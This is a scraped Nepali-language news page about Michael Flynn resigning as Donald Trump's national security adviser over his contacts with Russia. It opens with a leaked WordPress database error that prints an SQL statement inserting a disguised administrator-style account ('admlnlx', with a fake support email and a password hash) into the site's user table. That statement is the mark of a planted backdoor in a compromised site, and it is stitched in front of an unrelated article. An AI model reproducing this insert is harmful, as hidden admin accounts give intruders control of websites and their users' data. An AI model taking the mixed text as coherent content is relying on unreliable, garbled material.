WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BXULrj25eqq1mBX7hPt60yUsR65AlC.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 15:42:41', '', 'admlnlx', 'admlnlx')
एजेन्सी, फागुन ३ –
अमेरिकी राष्ट्रपति डोनाल्ड ट्रम्पका राष्ट्रिय सुरक्षा सल्लाहकार माइकल फ्लिनले राजिनामा दिएका छन् ।
रुससँग निकटसम्बन्ध भएको विषय सार्वजनिक भएपछि फ्लिनलाई राजिनामा दिन दबाब बढेको थियो ।
केही अमेरिकी सञ्चारमाध्यमले ट्रम्पले सत्ता सम्हाल्नु पूर्व अमेरिकास्थित रुसी राजदूतसँग प्रतिबन्धका विषयमा छलफल गरेको दावी गरेका थिए ।
जुन विदेश नीतिको उल्लंघन मानिन्छ । उनले उपराष्ट्रपति माइक पेन्सलाई पनि आफूले त्यस्तो कुरा नगरे भन्दै विश्वास दिलाएका थिए ।
जसलाई हवाला दिएर पेन्सले फ्लिनका बचाउ गरेका थिए । फ्लिनको गतिविधि राष्ट्र हितमा नभएको भन्दै डेमोक्रेट नेताहरुले राजिनामा मागेका थिए ।
माइकल फ्लिन चुनाव प्रचारका समयमा ट्रम्पका निकै नजिकका सहयोगी मानिन्थे ।